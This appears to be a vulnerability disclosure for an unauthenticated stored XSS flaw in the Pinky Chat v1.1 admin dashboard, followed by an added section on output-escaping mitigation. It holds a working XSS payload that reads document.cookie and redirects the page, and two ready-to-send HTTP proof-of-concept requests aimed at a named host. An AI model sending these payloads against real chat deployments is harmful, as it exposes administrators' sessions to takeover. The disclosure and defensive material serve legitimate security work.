[+] :: Exploit Title: Pinky Chat v1.1 - Unauthenticated Persistent XSS
[+] :: Google Dork: N/A
[+] :: Date: 2020-10-13
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: Rainbowbalaji [ https://codecanyon.net/user/rainbowbalaji ]
[+] :: Software Version: 1.1
[+] :: Software Link: https://codecanyon.net/item/pinky-chat-live-chat-support-app/24265370
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79
[i] :: Info:
An unauthenticated persistent (stored) XSS vulnerability was discovered in Pinky Chat (tested version: v1.1).
The visitor-supplied chat data is stored without proper encoding, and the injected payload executes inside the admin dashboard for any privileged user (admin or operator) who views it.
[$] :: Payload:
4325"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);top.location=`https://ex-mi.ru`;>
[!] :: PoC #1 (Burp Suite):
POST /livechat/chat-ajax/new HTTP/1.1
Host: prothemes.biz
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 228
Referer: https://prothemes.biz/livechat/chat
Cookie: [cookies_here]
json=1&name=4325%22--%3E%22%3E'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Ex.Mi%60)%3B(alert)(document.cookie)%3Btop.location%3D%60https%3A%2F%2Fex-mi.ru%60%3B%3E&email=poc%40vuln.tld&help=1&image=1
[!] :: PoC #2 (Burp Suite):
POST /livechat/chat-ajax/add HTTP/1.1
Host: prothemes.biz
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 27
Referer: https://prothemes.biz/livechat/chat
Cookie: pinky_user=4325%26quot%3B--%26gt%3B%26quot%3B%26gt%3B%5C%27%60+--+%60%26lt%3B%21--%26lt%3Bimg+src%3D%26quot%3B--%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3D%28alert%29%28%60Ex.Mi%60%29%3B%28alert%29%28document.cookie%29%3Btop.location%3D%60https%3A%2F%2Fex-mi.ru%60%3B%26gt%3B; pinky_email=poc%40vuln.tld; pinky_avatar=1;
json=1&msg=Ex.Mi&chatID=440
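Mitigation example (added here; this is not code from the advisory, from Pinky Chat, or from the vendor): the root cause of CWE-79 in this class of live-chat app is that visitor fields (name, email, msg) are written into the admin dashboard's HTML without contextual output encoding. The snippet below shows output-time HTML escaping applied to those fields, uses the advisory's own payload as the sample input, and includes a regression check that the rendered fragment contains only the tags the template emits. The renderChatRow() helper and its table layout are hypothetical; only the parameter names come from the requests above.

```javascript
// Added example, not code from the Pinky Chat advisory or the vendor.
// Assumed: the admin dashboard builds its chat list as an HTML string from the
// stored visitor fields (name, email, msg). renderChatRow() and its layout are
// hypothetical; only the field names come from the advisory's requests.

// The advisory's payload, embedded here as the sample untrusted input.
const ADVISORY_PAYLOAD =
  '4325"-->">\'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);' +
  '(alert)(document.cookie);top.location=`https://ex-mi.ru`;>';

// Encode the characters that can terminate an HTML text node, attribute value
// or comment. Applied at output time, this neutralises the payload in an
// HTML-text or double-quoted-attribute context.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#39;', '`': '&#96;',
  };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Hypothetical dashboard row: every untrusted field is escaped at the point of
// output, regardless of what the storage layer (database, pinky_* cookies)
// did or did not do with it on the way in.
function renderChatRow(chat) {
  return (
    '<tr>' +
    '<td class="name">' + escapeHtml(chat.name) + '</td>' +
    '<td class="email"><a href="mailto:' + escapeHtml(chat.email) + '">' +
      escapeHtml(chat.email) + '</a></td>' +
    '<td class="msg">' + escapeHtml(chat.msg) + '</td>' +
    '</tr>'
  );
}

// Regression check for the template above: after rendering, the only tags
// present in the fragment must be the ones the template itself emits.
function onlyTemplateTags(html) {
  const allowed = new Set(['tr', '/tr', 'td', '/td', 'a', '/a']);
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.every((tag) => allowed.has(tag.slice(1, -1).split(/\s+/)[0]));
}

// Stand-alone run: the advisory's payload rendered through the escaping
// template, then the same check against an unescaped rendering (constructed).
const demoRow = renderChatRow({ name: ADVISORY_PAYLOAD, email: 'poc@vuln.tld', msg: 'Ex.Mi' });
console.log(demoRow);
console.log('escaped row passes check  :', onlyTemplateTags(demoRow));
console.log('unescaped name passes     :', onlyTemplateTags('<td>' + ADVISORY_PAYLOAD + '</td>'));
```

Escaping must happen at the output boundary for the context the value lands in; an entity-encoded copy in a cookie (as seen in the `pinky_user` cookie of PoC #2) says nothing about how the dashboard template renders the stored value. For a URL or JavaScript context (e.g. a `href` built from visitor input) a different encoder is needed; the helper above covers HTML text and quoted attributes only.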
[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi